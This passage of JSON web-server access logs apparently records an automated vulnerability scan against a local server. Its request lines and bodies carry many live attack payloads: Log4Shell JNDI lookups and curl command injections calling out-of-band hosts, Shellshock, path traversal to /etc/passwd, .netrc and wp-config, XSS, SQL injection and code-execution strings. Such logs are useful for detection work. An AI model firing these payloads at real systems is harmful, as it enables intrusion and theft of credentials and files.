"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"j_username=${jndi:ldap://${hostName}.c9v8h8gsmpv8c1qg07h0kn8cji31qc648.oast.fun}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"x_login=../../../wp-config","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/297MTzWMoU5b7juQIUPlNiZVvut\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://c9v8h8gsmpv8c1qg07h0ns65ojgixht5m.oast.fun/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/297MTzWMoU5b7juQIUPlNiZVvut HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl `whoami`.c9v8h8gsmpv8c1qg07h035uo9yoq5fmwy.oast.fun} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.641","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F297MTmkkG4lECzjnF1EJeuOl9Fs.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini 